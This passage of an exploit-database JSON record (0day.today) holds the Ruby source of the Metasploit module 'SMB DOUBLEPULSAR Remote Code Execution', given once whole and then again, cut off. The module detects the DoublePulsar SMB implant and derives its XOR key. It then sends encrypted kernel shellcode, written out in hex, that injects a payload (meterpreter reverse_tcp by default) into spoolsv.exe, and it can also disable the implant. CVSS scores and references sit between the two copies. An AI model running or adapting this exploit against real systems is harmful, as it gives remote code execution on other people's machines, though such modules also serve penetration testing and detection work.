'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => 
true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-04] #"}, "lastseen": "2021-09-03T22:12:16", "differentElements": ["sourceData"], "edition": 6}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "bcf488fe0500cf68e5b81579b30ae626", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-04T22:15:58", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:142548"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", 
"OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-04T22:15:58", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-04T22:15:58", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => 
true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
